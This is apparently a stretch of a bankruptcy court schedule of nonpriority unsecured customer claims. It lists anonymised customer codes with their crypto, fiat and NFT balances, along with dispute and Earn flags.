| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381879 | | USD[10.00] | | |
| 07381880 | | CUSDT[3], DOGE[1179.55485256], USD[0.00] | Yes | |
| 07381882 | | DOGE[144.09182453], TRX[1], USD[0.00] | | |
| 07381883 | | DOGE[0.01429143], ETH[0], LINK[0], USD[0.00] | | |
| 07381886 | | BTC[.2155], ETH[1.9981], ETHW[1.9981], USD[5004.30] | | |
| 07381887 | | USD[10.00] | | |
| 07381888 | | CUSDT[3], DOGE[25.510425], USD[10.04], USDT[0] | | |
| 07381889 | | USD[10.00] | | |
| 07381890 | | BRZ[2], CUSDT[2], DOGE[0], MATIC[3.55788659], USD[0.00], YFI[0] | | |
| 07381891 | | USD[10.00] | | |
| 07381893 | | CUSDT[1], DOGE[34.47058400], TRX[49.48525796], USD[0.00] | Yes | |
| 07381894 | | USD[10.00] | | |
| 07381895 | | DOGE[1228.03309745], TRX[1], USD[10.00] | | |
| 07381897 | | BRZ[1], CUSDT[3], USD[0.01] | | |
| 07381899 | | USD[0.00] | | |
| 07381900 | | CUSDT[3], DAI[22.22258126], DOGE[2.47845857], LINK[1.68004389], USD[2.42], USDT[49.68076725] | | |
| 07381901 | | MATIC[.8695931], USD[9.00] | | |
| 07381902 | | USD[10.00] | | |
| 07381903 | | USD[10.00] | | |
| 07381905 | | USD[10.00] | | |
| 07381906 | | USD[10.00] | | |
| 07381907 | | USD[10.00] | | |
| 07381908 | | BAT[1], BCH[0], BRZ[4], BTC[0], CUSDT[0], DOGE[7.00057537], ETH[0], GRT[1], LINK[0], LTC[0], NFT (311698030391547885/Sloth #5449)[1], NFT (355345433953283446/ApexDucks #1005)[1], NFT (381464579400793265/Frog #7209)[1], NFT (406830875099474358/MagicEden Vaults)[1], NFT (407730451487455730/MagicEden Vaults)[1], NFT (425549860702159843/ApexDucks #1384)[1], NFT (435262187665522320/Cyber Frogs Ramen)[1], NFT (464587215704859794/MagicEden Vaults)[1], NFT (496368179831468519/Golden bone pass)[1], NFT (527904181469757533/Coogi #4505)[1], NFT (539660775798482060/MagicEden Vaults)[1], NFT (574738052248988996/MagicEden Vaults)[1], SHIB[13], SOL[0], SUSHI[0], TRX[7], UNI[0], USD[0.19], USDT[1.00888891] | Yes | |
| 07381909 | | USD[10.00] | | |
| 07381910 | | USD[6.59], USDT[0] | Yes | |
| 07381911 | | CUSDT[1], DOGE[68.31302523], USD[0.00] | | |
| 07381912 | | BTC[.00538287], CUSDT[18.7640964], DOGE[1948.49948301], ETH[.16126808], ETHW[.16077857], TRX[1], USD[272.97], USDT[1.10744352] | Yes | |
| 07381913 | | USD[10.00] | | |
| 07381914 | | BRZ[4], CUSDT[7], DOGE[1], TRX[4], USD[0.00] | Yes | |
| 07381915 | | DOGE[137.65310811], USD[0.00] | | |
| 07381916 | | USD[0.41] | | |
| 07381918 | | USD[0.01], USDT[0] | | |
| 07381919 | | USD[0.00] | | |
| 07381920 | | CUSDT[3], DOGE[1793.83510925], ETH[.08934382], ETHW[.08830336], SOL[1.6386314], TRX[2], USD[0.00] | Yes | |
| 07381921 | Contingent, Disputed | USD[10.00] | | |
| 07381922 | | ALGO[92.23310767], BTC[.00000525], CUSDT[5655.0192874], DOGE[.28210184], ETH[.00000363], ETHW[.48128877], GRT[2.01881341], KSHIB[684.39706081], SHIB[410.25863098], SOL[.00010349], TRX[6], USD[151.93], USDT[5.23332864] | Yes | |
| 07381923 | | CAD[0.00], SOL[0], USD[49.40] | | |
| 07381924 | | USD[10.00] | | |
| 07381925 | | LTC[.04353227], USD[0.00] | | |
| 07381926 | | SOL[28.74194427], TRX[1], USD[0.00] | Yes | |
| 07381927 | | AAVE[.10074689], BTC[.00161292], CUSDT[10], DOGE[792.15560886], ETH[.01189451], ETHW[.01174392], GRT[1.00133413], LINK[.66435946], LTC[.13442893], MATIC[7.44241763], SOL[1.11889689], SUSHI[2.30280325], TRX[275.84833793], UNI[.63569116], USD[479.78] | Yes | |
| 07381928 | | BAT[0], DOGE[0], TRX[1], USD[0.00] | | |
| 07381929 | | SOL[0], USD[4.33] | | |
| 07381930 | | CUSDT[2], USD[0.00] | Yes | |
| 07381932 | | ETH[0], USD[0.05] | Yes | |
| 07381933 | | DOGE[.02221835], TRX[1], USD[0.01] | | |
| 07381936 | Contingent, Disputed | USD[10.00] | | |
| 07381937 | | DOGE[463.37373789], USD[0.00] | | |
| 07381938 | | BRZ[4], CUSDT[11], DOGE[1], ETH[.00000001], SOL[.00000001], TRX[13.03008759], USD[0.00], USDT[0] | Yes | |
| 07381939 | | DOGE[171.16672546], USD[0.00] | | |
| 07381940 | | CUSDT[1], DOGE[20000.29952594], TRX[2], USD[0.00] | | |
| 07381941 | | CUSDT[5], TRX[4], USD[0.01] | | |
| 07381942 | | BTC[0], DOGE[1], TRX[1], USD[43.75], USDT[0] | Yes | |
| 07381944 | | USD[10.00] | | |
| 07381945 | | USD[10.00] | | |
| 07381946 | | CUSDT[2], DOGE[15.54915572], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381947 | | CUSDT[2], DOGE[353.63518407], TRX[1], USD[38.61] | | |
| 07381948 | | DOGE[566.5407437], USD[0.00] | | |
| 07381949 | | DOGE[.68309176], USD[0.00] | | |
| 07381950 | | USD[10.00] | | |
| 07381951 | | USD[10.00] | | |
| 07381953 | | USD[0.01] | Yes | |
| 07381955 | | USD[10.00] | | |
| 07381956 | | USD[10.00] | | |
| 07381957 | | CUSDT[2], USD[0.00] | Yes | |
| 07381959 | | DOGE[1], USD[0.00] | | |
| 07381960 | | USD[10.00] | | |
| 07381962 | | DOGE[1240.73391838], USD[10.00] | | |
| 07381963 | | CUSDT[1], DOGE[140.70422747], USD[0.00] | | |
| 07381964 | | USD[10.00] | | |
| 07381965 | | BRZ[1], DOGE[.97540628], GBP[7.90], USD[0.00] | Yes | |
| 07381966 | | USD[10.00] | | |
| 07381967 | | CUSDT[1], DOGE[5208.52183954], TRX[1], USD[0.00], USDT[15.91847195] | | |
| 07381968 | | DOGE[110.58785328], TRX[1], USD[0.00] | | |
| 07381969 | | USD[10.00] | | |
| 07381970 | | BTC[.00000009], CUSDT[2], ETH[.00063033], ETHW[.00063033], TRX[2], USD[0.00] | | |
| 07381971 | | USD[10.00] | | |
| 07381972 | | CUSDT[1], LINK[.03208166], USD[0.00] | Yes | |
| 07381973 | | USD[0.00] | | |
| 07381974 | | TRX[112.49382657], USD[0.00] | | |
| 07381975 | | CUSDT[1.9908067], DOGE[1.00034251], USD[0.01] | Yes | |
| 07381976 | | CUSDT[3], DOGE[1602.04667936], TRX[1], USD[0.00] | | |
| 07381977 | | USD[0.00] | | |
| 07381978 | | CUSDT[3], DOGE[.00000056], TRX[1], USD[30.51] | | |
| 07381979 | | CUSDT[1], USD[0.00] | | |
| 07381980 | | BTC[.00020766], USD[0.00] | | |
| 07381981 | | DOGE[.00004155], TRX[.00003489], USD[0.01], USDT[0] | | |
| 07381982 | | BCH[.01207608], BTC[.00011248], CUSDT[1], DOGE[114.36483378], USD[0.00] | Yes | |
| 07381983 | | BRZ[1], CUSDT[4], DOGE[2569.31448906], GRT[188.80842349], TRX[2561.37400209], USD[0.00] | | |
| 07381984 | | BCH[.02052045], USD[0.00] | Yes | |
| 07381987 | | BCH[.18203928], CUSDT[2], DOGE[252.00912093], GRT[1.01221502], LINK[1.12453212], PAXG[.07491928], SOL[1.02606223], TRX[213.76251703], USD[0.60], USDT[1.98821859] | | |
| 07381988 | | USD[10.00] | | |
| 07381989 | | CUSDT[502.06986215], TRX[1], USD[0.00] | Yes | |
| 07381990 | | BTC[0], SOL[0], TRX[.000004], USD[0.17], USDT[0.00183060] | | |
| 07381991 | | DOGE[126.30215947], USD[0.00] | | |
| 07381992 | | BTC[.0002315], USD[10.00] | | |
| 07381993 | | BRZ[0], SHIB[48688807.31096179], USD[0.00] | Yes | |
| 07381995 | | BRZ[2], DOGE[8989.57585712], LINK[1], USD[0.00] | | |
| 07381996 | | BAT[341.6232911], DOGE[1056.01049484], GRT[221.06298247], KSHIB[4807.50963998], LINK[23.99652536], LTC[2.06360167], NFT (322809538446974060/Australia Ticket Stub #1840)[1], NFT (365490634432570240/Entrance Voucher #3827)[1], SHIB[36292598.45395743], SOL[2.95558179], SUSHI[50.17241287], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07381999 | | USD[10.00] | | |
| 07382001 | | BTC[.0003941], CUSDT[1], DOGE[1061.23791764], SHIB[19095.7701721], TRX[397.20408364], USD[0.27] | Yes | |
| 07382002 | | USD[10.00] | | |
| 07382003 | | USD[10.00] | | |
| 07382004 | | LTC[.00000707], USD[0.00] | Yes | |
| 07382005 | | BRZ[1], CUSDT[4], DOGE[1], USD[0.00] | | |
| 07382006 | | DOGE[141.30732449], TRX[1], USD[0.00] | | |
| 07382007 | | USD[10.00] | | |
| 07382008 | | ALGO[125.67893479], BAT[176.77534001], BRZ[309.01994981], DOGE[6.5], LINK[1.797579], NEAR[3.93490872], SHIB[87.48587045], TRX[4], USD[23.39] | Yes | |
| 07382009 | | USD[0.00] | | |
| 07382010 | | USD[0.00] | Yes | |
| 07382011 | | USD[10.00] | | |
| 07382012 | | BTC[.00087204], ETH[.0608744], ETHW[.00600817], SHIB[1], USD[0.00] | Yes | |
| 07382013 | | CUSDT[6], DOGE[900.00002682], SHIB[4313440.703637], USD[0.01] | | |
| 07382014 | | USD[0.12] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382015 | | USD[0.00] | | |
| 07382016 | | USD[10.92] | Yes | |
| 07382017 | | CUSDT[1], DOGE[0], ETH[0], GRT[0], USD[0.00] | | |
| 07382018 | | BTC[.00007714], SOL[0] | | |
| 07382019 | | BRZ[2], CUSDT[3], DOGE[3.26442765], TRX[1.8427283], USD[0.00] | | |
| 07382020 | | DOGE[8771.97584102], USD[0.20] | | |
| 07382021 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07382022 | | DOGE[1.10654462], USD[0.00] | Yes | |
| 07382025 | | DOGE[0, ETHW[.051393], USD[0.11] | | |
| 07382031 | | BAT[215.99063469], BRZ[1], CUSDT[308.45478237], DOGE[1792.08907802], ETH[.00298283], ETHW[.00298283], LINK[12.60261408], LTC[1.03097727], SOL[2.03730416], TRX[216.8661404], USD[0.06] | | |
| 07382032 | | USD[10.00] | | |
| 07382033 | | BAT[40.89521991], CUSDT[5], DOGE[490.94078042], LTC[0], TRX[79.54397123], USD[0.00] | | |
| 07382035 | | USD[10.00] | | |
| 07382036 | | DOGE[170.11970813], USD[0.00] | | |
| 07382038 | | DOGE[124.23273581], USD[5.15] | | |
| 07382039 | | USD[10.00] | | |
| 07382040 | | USD[10.00] | | |
| 07382041 | | USD[0.66], USDT[0] | Yes | |
| 07382042 | | USD[10.00] | | |
| 07382043 | | USD[10.00] | | |
| 07382044 | | BTC[.00000602], USD[0.00] | | |
| 07382046 | | USD[10.00] | | |
| 07382047 | Contingent, Disputed | BTC[0], LINK[.00000001], USD[24.55] | | |
| 07382048 | | USD[2430.36] | Yes | |
| 07382049 | | USD[10.00] | | |
| 07382050 | | BAT[3.16944579], BF_POINT[200], BTC[0.00000001], CUSDT[7], DOGE[8.40952067], GRT[3], LINK[.07703777], SOL[0], SUSHI[0], UNI[.06085], USD[0.01], USDT[1.09071314] | Yes | |
| 07382052 | | GRT[4.23205457], TRX[1], USD[0.00] | | |
| 07382053 | | DOGE[1], USD[0.00] | | |
| 07382054 | | BTC[.0002292], CUSDT[3], USD[0.00] | | |
| 07382055 | | BAT[.00003456], CUSDT[1], DOGE[143.04558713], PAXG[.01163175], SHIB[1], SOL[2.70835822], SUSHI[3.82364775], TRX[265.11248741], USD[13.09] | Yes | |
| 07382056 | | CUSDT[4], DOGE[251.35765891], TRX[114.91670597], USD[0.01] | | |
| 07382057 | | BAT[3], BRZ[2], BTC[.05374415], CUSDT[3], DOGE[319.25793218], ETH[1.03648966], ETHW[1.03648966], TRX[1], USD[2227.74] | | |
| 07382058 | | USD[10.00] | | |
| 07382060 | | BTC[.00000013], USD[0.00] | | |
| 07382062 | | DOGE[.00000001], SHIB[1], USD[0.01] | Yes | |
| 07382063 | | BTC[0], ETH[0.00000001], LTC[.00000001], MATIC[0.35175433], SOL[0.00659274], USD[0.00] | | |
| 07382065 | | DOGE[137.67045035], TRX[1], USD[0.00] | Yes | |
| 07382066 | | CUSDT[1], DOGE[3], GRT[21.11945254], KSHIB[477.35431146], LINK[0.81584030], TRX[796.69581886], USD[5.43] | Yes | |
| 07382068 | | GRT[121.58699761], MATIC[102.23757968], USD[0.00] | Yes | |
| 07382069 | | USD[10.00] | | |
| 07382070 | | USD[10.00] | | |
| 07382071 | | USD[10.00] | | |
| 07382072 | | ALGO[0], BRZ[.00006018], GRT[.0119395], SHIB[1], SOL[.00000001], SUSHI[.00032079], USD[0.00], USDT[0.00001003] | Yes | |
| 07382074 | | USD[0.01] | | |
| 07382075 | | DOGE[0], ETH[0], SHIB[124690.71890504], USD[0.00] | | |
| 07382076 | | GRT[.844] | | |
| 07382077 | | BTC[.00462325], DOGE[700.77381981], TRX[1151.89068847], USD[0.02], USDT[0] | | |
| 07382078 | | USD[10.00] | | |
| 07382079 | | SHIB[342056.01824050], USD[0] | | |
| 07382080 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07382082 | | AAVE[0], AVAX[0], BTC[0], DOGE[1], ETH[0], GRT[0], NFT [31327681775628766O/Entrance Voucher #29432][1], NFT [567513094123354741/Humpty Dumpty #197][1], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07382083 | | CUSDT[1], DOGE[409.47804898], USD[0.64] | | |
| 07382084 | | BTC[.00006087], ETH[.00215085], ETHW[.00215085], LINK[.09288909], USD[0.00] | | |
| 07382085 | | BRZ[1], BTC[0], CUSDT[3], DOGE[12.67400408], ETH[0], ETHW[0.99648190], GRT[1.00347714], SUSHI[0], TRX[3], USD[1.68], USDT[2.19399109] | Yes | |
| 07382087 | | USD[10.00] | | |
| 07382088 | | USD[10.00] | | |
| 07382089 | | USD[10.00] | | |
| 07382090 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382091 | | USD[1010.00] | | |
| 07382092 | | BRZ[1], CUSDT[6], DOGE[505.64221755], TRX[4], USD[0.01] | Yes | |
| 07382093 | | CUSDT[2], DOGE[.00009921], USD[0.00] | | |
| 07382094 | | USD[10.00] | | |
| 07382095 | | BRZ[2], CUSDT[2], DOGE[1], GRT[1], SOL[0], TRX[1], USD[0.00] | | |
| 07382096 | | BRZ[2], DOGE[.00003093], TRX[1], USD[0.00] | Yes | |
| 07382098 | | USD[10.00] | | |
| 07382099 | | BCH[.00954705], DOGE[67.78532333], USD[0.00] | | |
| 07382100 | | CUSDT[3], DOGE[106.38129349], SHIB[420748.168145], USD[0.00] | | |
| 07382102 | | USD[2.86] | | |
| 07382103 | | LTC[.04777819], USD[0.00] | | |
| 07382104 | | USD[10.00] | | |
| 07382105 | | USD[0.01] | | |
| 07382106 | | CUSDT[237.73367379], DOGE[458.42628784], SOL[.30586487], TRX[68.95383716], USD[42.19] | | |
| 07382107 | | USD[10.00] | | |
| 07382108 | | CUSDT[3], DOGE[.81697065], TRX[1], USD[129.99] | | |
| 07382109 | | DOGE[141.3618775], USD[0.00] | | |
| 07382110 | | CUSDT[1], DOGE[.03589315], TRX[1], USD[0.00] | | |
| 07382112 | | USD[0.00] | | |
| 07382113 | | USD[10.00] | | |
| 07382115 | | SOL[1.20467645], USD[0.00] | | |
| 07382116 | | TRX[1], USD[10.00] | | |
| 07382119 | | DOGE[124.10250618], USD[0.00] | | |
| 07382120 | | USD[10.00] | | |
| 07382121 | | USD[10.00] | | |
| 07382122 | | DOGE[2], USD[0.00] | Yes | |
| 07382123 | | USD[10.00] | | |
| 07382124 | | BRZ[2], CUSDT[4], DOGE[400.08041988], ETH[.09333078], ETHW[.09333078], SHIB[116543.9644395], TRX[5], USD[40.00] | | |
| 07382125 | | DOGE[3], USD[0.00], USDT[0] | | |
| 07382128 | | DOGE[4], USD[0.01] | | |
| 07382129 | | USD[10.00] | | |
| 07382130 | | USD[10.00] | | |
| 07382131 | | DOGE[595.20906462], USD[331.91] | | |
| 07382132 | | USD[10.00] | | |
| 07382134 | | USD[10.00] | | |
| 07382135 | | ETH[0], ETHW[0], TRX[0], USD[0.00] | | |
| 07382136 | | CUSDT[3], DOGE[.0000068], TRX[1], USD[20.27] | Yes | |
| 07382137 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07382138 | | TRX[188.58040068], USD[0.00] | | |
| 07382139 | | GRT[4.71730682], USD[0.00] | | |
| 07382140 | | USD[10.00] | | |
| 07382141 | | BTC[.00021124], CUSDT[1], DOGE[144.20227195], USD[0.00] | | |
| 07382142 | | BRZ[1], BTC[0], DOGE[0], GRT[1], SOL[0], TRX[2], USD[0.00], USDT[0] | | |
| 07382143 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07382144 | | BTC[0], ETH[0], ETHW[0], USD[15431.86] | | |
| 07382145 | | DOGE[148.51450593], USD[0.00] | | |
| 07382146 | | USD[10.00] | | |
| 07382147 | | USD[10.00] | | |
| 07382148 | | USD[10.00] | | |
| 07382149 | | BAT[1.0165555], DOGE[17.18239964], GRT[0], NFT[38008740787711975/David #627][1], NFT[410870412307989915/Fortune Cookies #1270][1], NFT[430566911454105098/David #603][1], NFT[560005697651919366/Fortune Cookies #1222][1], SOL[0], TRX[2], USD[0.00], USDT[0.000000011] | Yes | |
| 07382150 | | BAT[0], BRZ[0], CUSDT[1], DOGE[0], ETH[0.00000001], ETHW[0], GRT[0], TRX[0], USD[0.00], USDT[0.00000752] | | |
| 07382151 | | USD[0.00] | | |
| 07382153 | | BAT[1], BTC[0], DOGE[0], SUSHI[17.4035139], TRX[2], USD[0.00] | | |
| 07382155 | | BTC[.0000984], DOGE[.485], ETH[.00009306], ETHW[.00009306], LINK[.08533749], SHIB[40455.90646427], SOL[.00124211], USD[2.00] | | |
| 07382156 | | BAT[1.01461188], CUSDT[1], USD[0.00], USDT[1.08287809] | Yes | |
| 07382157 | | USD[10.00] | | |
| 07382159 | | DOGE[364.88230396], USD[10.00] | | |
| 07382160 | | CUSDT[1], DOGE[2], ETH[.0229243], ETHW[.0229243], USD[0.00] | | |

Amended Schedule F-52 nonpriority unsecured customer claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382161 | | CUSDT[2], DOGE[18.97534165], USD[0.00] | Yes | |
| 07382162 | | USD[10.00] | | |
| 07382164 | | DOGE[60.86485057], USD[10.00] | | |
| 07382165 | | DOGE[3384.94043682], TRX[1], USD[0.00], USDT[1] | | |
| 07382166 | | TRX[4], USD[0.00] | | |
| 07382167 | | DOGE[1], TRX[1], USD[10.42] | | |
| 07382168 | | BAT[15.32517234], USD[0.00] | | |
| 07382171 | | DOGE[31.28976342], USD[0.00] | | |
| 07382172 | | BAT[251.79751004], BRZ[1], CUSDT[21], DOGE[396.42122915], ETH[.12429754], ETHW[.12313847], GRT[19.61453246], LINK[11.56479224], LTC[1.08130757], MATIC[5.62994406], SHIB[370055.27434066], SOL[12.21459583], SUSHI[1.08045021], TRX[1581.40851626], UNI[.17294369], USD[-189.30] | Yes | |
| 07382175 | | USD[10.00] | | |
| 07382176 | | USD[10.00] | | |
| 07382177 | | DOGE[20.79065131], USD[2.00] | | |
| 07382178 | | CUSDT[1], DOGE[1], SUSHI[1.34029455], USD[0.00] | | |
| 07382179 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07382180 | | BTC[0], USD[0.00], USDT[0] | | |
| 07382181 | | BAT[0], CUSDT[2], DOGE[0], ETH[0], GRT[4.63875034], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07382182 | | USD[10.00] | | |
| 07382184 | | CUSDT[1], DOGE[1.00001946], USD[0.01] | | |
| 07382185 | | BRZ[2], CUSDT[1], DOGE[.00002503], GRT[10.14935712], TRX[1], USD[0.00] | | |
| 07382186 | | USD[10.00] | | |
| 07382187 | | CUSDT[2], USD[0.05] | | |
| 07382188 | | BRZ[1], USD[0.01] | | |
| 07382189 | | DOGE[2], ETH[0], SUSHI[.00019452], USD[0.00] | | |
| 07382190 | | CUSDT[3], TRX[1], USD[0.01] | Yes | |
| 07382191 | | ETH[.0165251], ETHW[.0165251], SHIB[5600000], SOL[12.33409252], USD[46.97] | | |
| 07382192 | | USD[10.00] | | |
| 07382196 | | USD[10.00] | | |
| 07382197 | | USD[10.00] | | |
| 07382198 | | BRZ[1], BTC[.00282923], DOGE[1], USD[9.51], USDT[1] | | |
| 07382200 | | SOL[28.54853222], TRX[1], USD[0.07] | | |
| 07382201 | | USD[10.00] | | |
| 07382204 | | DOGE[3036.23666954], USD[10.00] | | |
| 07382205 | | USD[10.00] | | |
| 07382206 | | USD[10.00] | | |
| 07382207 | | USD[8.43] | | |
| 07382208 | | USD[10.00] | | |
| 07382210 | | USD[10.00] | | |
| 07382211 | | USD[10.00] | | |
| 07382215 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07382216 | | USD[10.00] | | |
| 07382217 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07382218 | | USD[10.00] | | |
| 07382219 | | DOGE[128.98271206], USD[0.00] | | |
| 07382220 | | CUSDT[8], DOGE[.03373362], ETH[.00002331], ETHW[.00002331], TRX[.00797124], USD[21.70] | Yes | |
| 07382221 | | USD[10.00] | | |
| 07382222 | | SOL[.0275] | | |
| 07382223 | | USD[10.00] | | |
| 07382224 | | USD[0.00] | | |
| 07382226 | | USD[0.00] | | |
| 07382227 | | USD[0.20], USDT[0] | Yes | |
| 07382228 | | BTC[.0000035] | | |
| 07382229 | | USD[10.00] | | |
| 07382230 | | USD[10.00] | | |
| 07382233 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07382234 | | USD[10.00] | | |
| 07382237 | | CUSDT[13], DOGE[1004.39267213], ETH[.03151518], ETHW[.03151518], SHIB[334433.6084021], TRX[1], USD[0.00] | | |
| 07382239 | | DOGE[139.07194233], USD[0.00] | | |
| 07382240 | | DOGE[1], ETH[0.00573590], ETHW[0.00573590], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382241 | | LTC[.0352625], USD[0.00] | | |
| 07382242 | | USD[10.00] | | |
| 07382243 | | USD[10.00] | | |
| 07382244 | | USD[10.00] | | |
| 07382246 | | DOGE[2], GRT[1], USD[0.01] | | |
| 07382247 | | USD[10.00] | | |
| 07382248 | | BRZ[2], BTC[.82762614], CUSDT[5], DOGE[15437.86318824], ETH[1.08410719], ETHW[1.08410719], GRT[1], TRX[3], USD[5028.94], USDT[3] | | |
| 07382249 | | BTC[.00000006], USD[0.00] | | |
| 07382250 | | USD[10.00] | | |
| 07382251 | | DOGE[140.23253077], USD[0.00] | | |
| 07382253 | | USD[10.00] | | |
| 07382254 | | BAT[1], CUSDT[5], TRX[1], USD[0.00] | | |
| 07382255 | | CUSDT[1], DOGE[115.82844415], TRX[1230.23091446], USD[0.00] | | |
| 07382256 | Contingent, Disputed | BTC[0.00028856], DOGE[0], USD[0.00] | | |
| 07382258 | | BTC[.00017126], USD[0.00] | | |
| 07382259 | | BRZ[1], BTC[.00082598], CUSDT[240.17263653], DOGE[289.82583095], GRT[19.77646617], LTC[.11277344], TRX[428.38102821], USD[110.69] | | |
| 07382260 | | DOGE[126.35978928], USD[0.00] | | |
| 07382261 | | USD[10.00] | | |
| 07382262 | | BAT[0], DOGE[118.6036466], GRT[0], LINK[0], SOL[0], TRX[3.32363041], USD[0.00] | Yes | |
| 07382263 | | USD[10.00] | | |
| 07382264 | | USD[10.00] | | |
| 07382265 | | CUSDT[1], DOGE[129.42298432], TRX[1], USD[0.00] | | |
| 07382266 | | USD[10.00] | | |
| 07382267 | | BRZ[1], CUSDT[109.13459566], DOGE[4719.06948811], LINK[4.323942], NFT (302599504283711917/Cyber Frogs Ramen)[1], NFT (335959345501157948/Frog #884)[1], NFT (523905677449418409/Golden bone pass)[1], SOL[4.35278685], TRX[248.15074978], USD[0.00] | Yes | |
| 07382268 | | USD[10.00] | | |
| 07382269 | | AAVE[0], BAT[0], BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0.00006191], MKR[0], SHIB[7275.27134], SOL[0], SUSHI[0], TRX[2], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07382270 | | DOGE[1], SHIB[203837.73473753], USD[0.00] | Yes | |
| 07382271 | | CUSDT[1], DOGE[1.34207862], USD[0.00], USDT[0] | | |
| 07382273 | | USD[10.68] | Yes | |
| 07382274 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07382275 | | CUSDT[4], DOGE[1], TRX[173.02839487], USD[0.00] | | |
| 07382276 | | DOGE[37168023], GRT[1], TRX[2], USD[0.42] | | |
| 07382277 | | ETH[.00303064], ETHW[.00303064], USD[0.00] | | |
| 07382278 | | BF_POINT[100], BTC[.00001526], ETHW[0], USD[0.21] | Yes | |
| 07382279 | | USD[10.69] | Yes | |
| 07382283 | | USD[10.00] | | |
| 07382284 | | USD[10.00] | | |
| 07382285 | | BRZ[1], CUSDT[4], DOGE[1], GRT[0], LINK[0], TRX[2], USD[0.01] | | |
| 07382286 | | CUSDT[1], DOGE[632.28481452], USD[0.00] | | |
| 07382287 | | BAT[0], CUSDT[2], DOGE[0], TRX[0], USD[0.01], USDT[0.00000001] | | |
| 07382288 | | USD[10.00] | | |
| 07382289 | | USD[10.00] | | |
| 07382290 | Contingent, Disputed | USD[10.00] | | |
| 07382292 | | USD[10.00] | | |
| 07382294 | | BTC[.00021224], USD[0.00] | Yes | |
| 07382295 | | TRX[310.9] | | |
| 07382297 | | ALGO[0], BTC[0], DOGE[0.00000001], GRT[0], NEAR[0], SHIB[0], SOL[0], TRX[0], USD[0.00] | | |
| 07382299 | | DOGE[29.49442369], USD[0.00] | | |
| 07382300 | | USD[10.00] | | |
| 07382301 | | USD[10.00] | | |
| 07382302 | | BTC[.00023784], CUSDT[1], DOGE[4], GRT[0], USD[0.00] | | |
| 07382303 | | BCH[0], BTC[0], USD[6.78], USDT[0.00000001] | | |
| 07382304 | | AAVE[2.4690719], AVAX[26.8986094], BF_POINT[100], BRZ[5], CUSDT[9], DOGE[13.66046224], ETH[1.49741899], ETHW[1.49679016], LINK[19.80367865], MATIC[2423.95576527], SHIB[6], SOL[62.71957280], TRX[15.14462733], USD[0.00], USDT[0] | Yes | |
| 07382305 | Contingent, Disputed | BTC[0.00001100], DOGE[.84875], ETH[.0004015], ETHW[.0004015], USD[0.00] | | |
| 07382307 | | DOGE[139.00801103], USD[0.00] | | |
| 07382308 | | BTC[.00016912], CUSDT[1], DOGE[907.89044404], SHIB[2], TRX[1], USD[0.19] | | |
| 07382311 | | CUSDT[2], DOGE[1039.41033753], ETH[.28803685], ETHW[.28803685], TRX[3], USD[-59.78] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382312 | | USD[10.00] | | |
| 07382313 | | DOGE[147.34777685], USD[0.00] | | |
| 07382314 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], MATIC[0], SOL[0.00140393], USD[0.00] | Yes | |
| 07382315 | | USD[10.00] | | |
| 07382316 | | CUSDT[1], DOGE[.37740579], USD[0.00], USDT[0] | | |
| 07382317 | | BTC[.00021085], USD[0.00] | | |
| 07382318 | | USD[65.03] | Yes | |
| 07382319 | | BRZ[1], DOGE[4.02848444], LINK[23.58250105], TRX[1900.74200861], USD[0.42] | Yes | |
| 07382320 | | CUSDT[4], DOGE[2506.80265471], SHIB[3121187.16177208], USD[1.30] | Yes | |
| 07382321 | | USD[0.00] | | |
| 07382322 | | CUSDT[1], LINK[.31009053], USD[0.00] | Yes | |
| 07382323 | | USD[10.00] | | |
| 07382324 | | DOGE[148.58907309], TRX[1], USD[0.00] | | |
| 07382325 | | CUSDT[1], DOGE[9.25192709], USD[0.00] | Yes | |
| 07382326 | | CUSDT[9], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07382328 | | SOL[0], USD[0.00] | Yes | |
| 07382332 | | DOGE[.698], ETHW[3.779905], SOL[149.75592], USD[67.95], USDT[59.947] | | |
| 07382334 | | USD[0.00] | | |
| 07382338 | | CUSDT[1], DOGE[31.36552806], USD[0.00] | | |
| 07382339 | | USD[10.00] | | |
| 07382340 | | USD[10.00] | | |
| 07382341 | | USD[10.00] | | |
| 07382343 | | DOGE[134.5822929], USD[0.00] | | |
| 07382345 | | USD[10.00] | | |
| 07382346 | | CUSDT[1], TRX[298.49278115], USD[0.00] | | |
